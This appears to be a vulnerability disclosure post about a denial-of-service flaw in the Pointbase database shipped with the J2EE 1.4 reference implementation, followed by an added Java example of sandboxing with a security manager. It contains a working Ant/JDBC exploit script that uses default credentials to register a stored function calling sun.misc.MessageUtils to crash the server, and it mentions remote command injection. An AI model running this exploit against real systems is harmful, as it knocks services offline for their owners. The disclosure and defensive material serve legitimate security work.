Hi, the following code crashes the Pointbase 4.6 database that comes with the J2EE reference implementation. It is provided as an ant script for flexibility and to illustrate the involved resources. This is a cross-platform denial-of-service java exploit, caused by the fact that the pointbase installation coming with j2ee/ri 1.4 is not equipped with an appropriate security manager, thus giving all jars implicitly all permissions. These unlimited permissions can be exploited by an attacker using jdbc to crash the jvm running the pointbase server.

Unfortunately there is no policy file provided by Sun defining the necessary permissions for pointbase, leaving the application server deployer alone in the rain. And it is a long, time-consuming job figuring out the permissions when starting with a zero-permissions policy file. A recommended approach to find out the necessary permissions of an application tailored to the use case is test-driving the application with jchains (www.jchains.org) and using this tool to record the needed permissions in a permission template. After fine-tuning the recorded permissions and starting the application with a security manager that is configured with these permissions, the application runs in a confined "sandbox" mode, which prevents attackers from accessing vulnerable jdk routines like sun.misc.MessageUtils.toStderr.

Further possible exploitations are information disclosure and remote command injection (tested on java/winxp and java/linux, where I was able to start notepad.exe (win) or xemacs (linux) on the pointbase server via a jdbc command). Further details on these vulnerabilities and which major JDBC databases are vulnerable (it is not only pointbase having this bug, you may remember the jboss vulnerability in 9/2003) can be read in an upcoming report by illegalaccess.org. If interested in more details you can contact me.
(marc[at]marc-schoenefeld.com) Also send me an email to get a policy file tailored to the pointbase installation of j2ee14ri. Also feel free to download the jChains tool and send me your suggestions and further thoughts about it. jChains is free to use for educational purposes only, so you need to ask me for restrictions for any commercial usage.

Cheers
Marc Schoenefeld (marc[at]illegalaccess.org)

======================build.xml=======================
<!-- pointbase denial-of-service by marc schoenefeld -->
<project default="dos">
  <property name="host" value="192.168.0.7"/>
  <target name="dos">
    <sql driver="com.pointbase.jdbc.jdbcUniversalDriver"
         url="jdbc:pointbase://${host}:9092/sample"
         userid="pbpublic" password="pbpublic" print="true">
      <![CDATA[
      //DROP FUNCTION CRASH5(VARCHAR(20));
      CREATE FUNCTION CRASH5(IN P1 VARCHAR(20)) RETURNS VARCHAR(20)
        LANGUAGE JAVA NO SQL EXTERNAL NAME "sun.misc.MessageUtils::toStderr"
        PARAMETER STYLE SQL;
      SELECT CRASH5(null) from SYSUSERS;
      ]]>
      <classpath>
        <pathelement location="pbclient.jar"/>
      </classpath>
    </sql>
  </target>
</project>
======================build.xml=======================

--
Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld
Dipl. Wirtsch.-Inf. / Software Developer
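The confined "sandbox" mode the post recommends, as an added illustration that is not Marc's code, the jChains tool or Pointbase's own code: a small Java program probes sun.misc.MessageUtils the way a LANGUAGE JAVA function resolves its EXTERNAL NAME, first with no security manager, then under a minimal hypothetical Policy, then with the single accessClassInPackage grant that would silently undo the protection if a recorded permission template carried it. It assumes a JDK of the 1.4 to 8 era (on 17 the security manager needs -Djava.security.manager=allow and the class reports as absent; from 24 there is no security manager at all).

```java
// Added example (not from the post, jChains or Pointbase). Shows why the
// security manager blocks a stored function from reaching sun.misc.*, and
// that one careless grant in the policy template re-opens the hole.
// Assumes JDK 1.4 to 8, where sun.misc.MessageUtils ships in rt.jar.
import java.security.Permission;
import java.security.Policy;
import java.security.ProtectionDomain;

public class SandboxCheck {
    // Hypothetical switch standing in for this line in a policy file:
    //   permission java.lang.RuntimePermission "accessClassInPackage.sun.misc";
    static volatile boolean grantSunMiscAccess = false;

    // Resolve a class by name through the caller's class loader, which is how
    // an EXTERNAL NAME such as "sun.misc.MessageUtils::toStderr" is looked up.
    static String probe(String className) {
        try {
            Class.forName(className);
            return "reachable";
        } catch (SecurityException e) {
            return "denied";   // checkPackageAccess refused the restricted sun.* package
        } catch (ClassNotFoundException e) {
            return "absent";   // this JDK does not ship the class at all
        }
    }

    public static void main(String[] args) {
        String target = "sun.misc.MessageUtils";
        System.out.println("no security manager:        " + probe(target)); // reachable

        // Deliberately minimal Policy: grants nothing, except the one
        // RuntimePermission that re-opens sun.misc when the switch is on.
        // Installed before the SecurityManager, since setPolicy is itself
        // a privileged operation once a manager is active.
        Policy.setPolicy(new Policy() {
            @Override
            public boolean implies(ProtectionDomain domain, Permission perm) {
                return grantSunMiscAccess
                        && perm instanceof RuntimePermission
                        && "accessClassInPackage.sun.misc".equals(perm.getName());
            }
        });
        System.setSecurityManager(new SecurityManager());
        System.out.println("sandboxed, tight policy:    " + probe(target)); // denied

        grantSunMiscAccess = true; // the grant a careless template would contain
        System.out.println("sandboxed, sun.misc granted: " + probe(target)); // reachable
    }
}
```

The "denied" result comes from the package.access list in java.security, which a security manager enforces for every sun.* package; reviewing a recorded template for accessClassInPackage grants is the check that keeps the sandbox meaningful.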